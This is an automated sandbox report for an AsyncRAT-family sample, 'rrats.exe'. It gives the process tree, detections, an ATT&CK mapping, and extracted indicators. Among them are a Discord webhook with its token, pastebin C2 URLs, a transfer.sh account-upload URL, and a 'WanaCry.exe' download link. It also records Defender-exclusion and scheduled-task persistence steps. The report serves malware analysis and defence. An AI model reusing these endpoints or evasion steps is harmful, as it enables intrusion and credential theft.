                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Queries volume information: C:\Users\user\AppData\Roaming\Explorer.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Queries volume information: C:\Users\user\AppData\Roaming\Explorer.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\explore.exe | Queries volume information: C:\Users\user\AppData\Local\explore.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00CBDF1E
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CAB146 GetVersionExW, 0_2_00CAB146
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Native API | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Scheduled Task/Job | 2 Scheduled Task/Job | 2 Scheduled Task/Job | 121 Obfuscated Files or Information | Security Account Manager | 36 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 221 Security Software Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | 3 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph ID: 1571504 | Sample: rrats.exe | Startdate: 09/12/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 12 other signatures
DNS/IP: pastebin.com (Connects to a pastebin service (likely for C&C))

Process tree as drawn in the graph (numbers after a process name are the per-process counts shown in the graph, see legend):

Start
  rrats.exe 13
    dropped: C:\Users\user\AppData\Local\Temp\...\a.exe, PE32
    cmd.exe 1
      signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
      a.exe 9
        dropped: C:\Users\user\AppData\Local\Temp\...\rrat.exe, PE32
        signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        rrat.exe 8
          dropped: C:\Users\user\AppData\Roaming\Explorer.exe, PE32
          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Protects its processes via BreakOnTermination flag; 3 other signatures
          cmd.exe 1
            signatures: Adds a directory exclusion to Windows Defender
            powershell.exe 23
              signatures: Loading BitLocker PowerShell Module
            conhost.exe
          cmd.exe 1
            conhost.exe
            timeout.exe 1
            Explorer.exe
          cmd.exe 1
            conhost.exe
            schtasks.exe 1
      conhost.exe
  Explorer.exe 15 4
    network: 194.67.204.7, 49706, 88 IHOR-ASRU Russian Federation; 104.20.4.235, 443, 49914, 49987 CLOUDFLARENETUS United States; pastebin.com 172.67.19.24, 443, 49704, 49705 CLOUDFLARENETUS United States
    dropped: C:\Users\user\AppData\Local\explore.exe, PE32
    signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; Protects its processes via BreakOnTermination flag
    cmd.exe
      conhost.exe
      schtasks.exe
    cmd.exe
      conhost.exe
      schtasks.exe
  explore.exe
    signatures: Machine Learning detection for dropped file
  cmd.exe
    signatures: Adds a directory exclusion to Windows Defender
    powershell.exe
      signatures: Loading BitLocker PowerShell Module
    conhost.exe

Source | Detection | Scanner | Label | Link
rrats.exe | 45% | ReversingLabs | Win32.Trojan.Rastarby |
rrats.exe | 100% | Avira | TR/AVI.AsyncRat.fkvod |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Explorer.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\explore.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Roaming\Explorer.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\explore.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | 17% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | 82% | ReversingLabs | Win32.Backdoor.AsyncRat |
C:\Users\user\AppData\Local\explore.exe | 82% | ReversingLabs | Win32.Backdoor.AsyncRat |
C:\Users\user\AppData\Roaming\Explorer.exe | 82% | ReversingLabs | Win32.Backdoor.AsyncRat |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://www.w3.or | 0% | Avira URL Cloud | safe |
https://www.techniknews.net/wp-content/uploads/2018/07/discord-logo.jpg | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pastebin.com | 172.67.19.24 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://pastebin.com/raw/hbwHfEg3 | false | | high
https://pastebin.com/raw/hbwHfEg3 | false | | high
http://pastebin.com/raw/KKpnJShN | false | | high
https://pastebin.com/raw/KKpnJShN | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.techniknews.net/wp-content/uploads/2018/07/discord-logo.jpg | a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | false | Avira URL Cloud: safe | unknown
https://cdn.discordapp.com/attachments/903603651585663016/913496700734279730/WanaCry.exe | a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | false | | high
http://pastebin.com/raw/hbwHfEg3d | Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.w3.or | Explorer.exe, 00000010.00000002.4490902100.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pastebin.com/raw/hFaPBSUm | a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | false | | high
https://dl.teamviewer.com/download/TeamViewer_Setup_x64.exe | a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | false | | high
http://pastebin.comd | Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://transfer.sh/Accounts.txt? | a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pastebin.com | Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pastebin.com | Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ipv4bot.whatismyipaddress.com/ | a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | false | | high
https://discord.com/api/webhooks/780783005307895818/1tcNqwidYko-32qqkw7-SN35HpBY-1NoZHwFmRnTSgREpOcu | a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | false | | high
http://pastebin.com/raw/KKpnJShNd | Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://youtu.be/9Ew461CAlmQ?t=10Chttps://youtu.be/xAZMu-qKLxE?t=35 | a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.20.4.235 | unknown | United States | | 13335 | CLOUDFLARENETUS | true
172.67.19.24 | pastebin.com | United States | | 13335 | CLOUDFLARENETUS | false
194.67.204.7 | unknown | Russian Federation | | 35196 | IHOR-ASRU | true
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1571504
                                                            Start date and time:2024-12-09 14:11:06 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 55s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:30
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:rrats.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@43/19@2/3
                                                            EGA Information:
                                                            • Successful, ratio: 66.7%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 286
                                                            • Number of non-executed functions: 147
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
